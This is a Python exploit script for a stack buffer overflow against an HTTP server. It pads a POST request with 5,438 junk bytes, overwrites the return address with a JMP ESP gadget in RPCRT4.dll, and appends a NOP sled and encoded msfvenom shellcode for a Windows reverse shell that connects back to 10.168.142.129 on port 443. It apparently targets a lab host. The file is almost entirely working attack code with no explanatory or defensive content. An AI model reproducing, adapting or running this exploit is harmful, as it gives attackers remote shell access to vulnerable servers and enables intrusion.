#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/04/25 21:00:11 dhn Exp $

import struct
import socket

class Exploit:
    def __init__(self, server, port, payload):
        self._payload = payload
        self._server = server
        self._port = port

    def __connect(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self._server, self._port))
        return s


    def run(self):
        try:
            s = self.__connect()
            print("[+] Sending payload to " + str(self._server))
            s.send((self._payload + "\r\n"))
            s.close()
        except socket.error:
            print("[!] socket error")

if __name__ == "__main__":
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.168.142.129 LPORT=443 -f py \
    #        -v shell -e x86/alpha_mixed -b '\x00\x09\x0a\x0b\x0c\x0d\x20' EXITFUNC=thread
    shell =  ""
    shell += "\x89\xe7\xdb\xd1\xd9\x77\xf4\x5d\x55\x59\x49\x49\x49"
    shell += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
    shell += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
    shell += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
    shell += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x68\x68\x4b"
    shell += "\x32\x33\x30\x73\x30\x73\x30\x31\x70\x4c\x49\x48\x65"
    shell += "\x74\x71\x4b\x70\x65\x34\x6e\x6b\x76\x30\x70\x30\x6e"
    shell += "\x6b\x63\x62\x76\x6c\x4e\x6b\x62\x72\x62\x34\x4c\x4b"
    shell += "\x73\x42\x74\x68\x54\x4f\x4f\x47\x61\x5a\x65\x76\x54"
    shell += "\x71\x4b\x4f\x4e\x4c\x77\x4c\x30\x61\x73\x4c\x65\x52"
    shell += "\x44\x6c\x71\x30\x6f\x31\x4a\x6f\x36\x6d\x35\x51\x38"
    shell += "\x47\x38\x62\x7a\x52\x30\x52\x66\x37\x6e\x6b\x30\x52"
    shell += "\x76\x70\x4e\x6b\x32\x6a\x77\x4c\x6c\x4b\x30\x4c\x47"
    shell += "\x61\x71\x68\x58\x63\x53\x78\x77\x71\x38\x51\x76\x31"
    shell += "\x4e\x6b\x61\x49\x55\x70\x33\x31\x4b\x63\x6c\x4b\x52"
    shell += "\x69\x37\x68\x69\x73\x75\x6a\x57\x39\x4e\x6b\x54\x74"
    shell += "\x4c\x4b\x57\x71\x4b\x66\x35\x61\x49\x6f\x4e\x4c\x5a"
    shell += "\x61\x38\x4f\x44\x4d\x47\x71\x5a\x67\x75\x68\x4b\x50"
    shell += "\x31\x65\x6c\x36\x77\x73\x43\x4d\x4b\x48\x45\x6b\x63"
    shell += "\x4d\x56\x44\x71\x65\x79\x74\x66\x38\x6c\x4b\x50\x58"
    shell += "\x64\x64\x33\x31\x39\x43\x50\x66\x4c\x4b\x66\x6c\x52"
    shell += "\x6b\x4e\x6b\x46\x38\x57\x6c\x56\x61\x4e\x33\x6e\x6b"
    shell += "\x36\x64\x4c\x4b\x35\x51\x78\x50\x6c\x49\x73\x74\x31"
    shell += "\x34\x71\x34\x53\x6b\x53\x6b\x53\x51\x76\x39\x62\x7a"
    shell += "\x32\x71\x49\x6f\x6b\x50\x53\x6f\x73\x6f\x42\x7a\x6e"
    shell += "\x6b\x35\x42\x58\x6b\x6e\x6d\x31\x4d\x32\x48\x50\x33"
    shell += "\x75\x62\x45\x50\x57\x70\x75\x38\x64\x37\x32\x53\x66"
    shell += "\x52\x33\x6f\x52\x74\x43\x58\x42\x6c\x50\x77\x76\x46"
    shell += "\x43\x37\x39\x6f\x4e\x35\x6c\x78\x4e\x70\x37\x71\x45"
    shell += "\x50\x35\x50\x55\x79\x59\x54\x62\x74\x46\x30\x43\x58"
    shell += "\x71\x39\x4b\x30\x72\x4b\x45\x50\x79\x6f\x78\x55\x30"
    shell += "\x50\x66\x30\x50\x50\x42\x70\x51\x50\x72\x70\x67\x30"
    shell += "\x70\x50\x65\x38\x7a\x4a\x74\x4f\x69\x4f\x59\x70\x69"
    shell += "\x6f\x5a\x75\x6f\x67\x73\x5a\x56\x65\x50\x68\x34\x4a"
    shell += "\x4d\x78\x4e\x6e\x4e\x61\x33\x58\x37\x72\x65\x50\x77"
    shell += "\x71\x6d\x6b\x6f\x79\x59\x76\x62\x4a\x74\x50\x46\x36"
    shell += "\x31\x47\x61\x78\x4f\x69\x39\x35\x63\x44\x75\x31\x59"
    shell += "\x6f\x38\x55\x6d\x55\x39\x50\x64\x34\x44\x4c\x4b\x4f"
    shell += "\x50\x4e\x76\x68\x52\x55\x4a\x4c\x70\x68\x58\x70\x6e"
    shell += "\x55\x6e\x42\x63\x66\x39\x6f\x39\x45\x70\x68\x31\x73"
    shell += "\x62\x4d\x50\x64\x53\x30\x6f\x79\x4d\x33\x73\x67\x72"
    shell += "\x77\x62\x77\x45\x61\x58\x76\x33\x5a\x52\x32\x73\x69"
    shell += "\x31\x46\x4a\x42\x59\x6d\x70\x66\x4b\x77\x37\x34\x77"
    shell += "\x54\x57\x4c\x47\x71\x66\x61\x4e\x6d\x70\x44\x34\x64"
    shell += "\x34\x50\x39\x56\x63\x30\x72\x64\x66\x34\x70\x50\x32"
    shell += "\x76\x32\x76\x63\x66\x70\x46\x30\x56\x32\x6e\x51\x46"
    shell += "\x72\x76\x43\x63\x63\x66\x73\x58\x50\x79\x78\x4c\x37"
    shell += "\x4f\x6d\x56\x49\x6f\x6a\x75\x4e\x69\x6b\x50\x62\x6e"
    shell += "\x30\x56\x73\x76\x39\x6f\x30\x30\x63\x58\x74\x48\x4e"
    shell += "\x67\x47\x6d\x75\x30\x69\x6f\x5a\x75\x6f\x4b\x69\x70"
    shell += "\x47\x6d\x44\x6a\x74\x4a\x70\x68\x39\x36\x6e\x75\x4f"
    shell += "\x4d\x6d\x4d\x49\x6f\x5a\x75\x37\x4c\x65\x56\x33\x4c"
    shell += "\x77\x7a\x6b\x30\x69\x6b\x6d\x30\x34\x35\x56\x65\x6f"
    shell += "\x4b\x47\x37\x62\x33\x64\x32\x70\x6f\x71\x7a\x75\x50"
    shell += "\x71\x43\x49\x6f\x6a\x75\x41\x41"

    junk = "A" * 5438
    jmp_esp = "\x7e\x6e\xef\x77" # RPCRT4.dll

    payload = junk
    payload += jmp_esp
    payload += "\x90" * 10 + shell

    request = "POST / " + payload + " HTTP/1.1\r\n"
    request += "Host: 127.0.0.1\r\n\r\n"

    exploit = Exploit("10.168.142.128", 80, request)
    exploit.run()
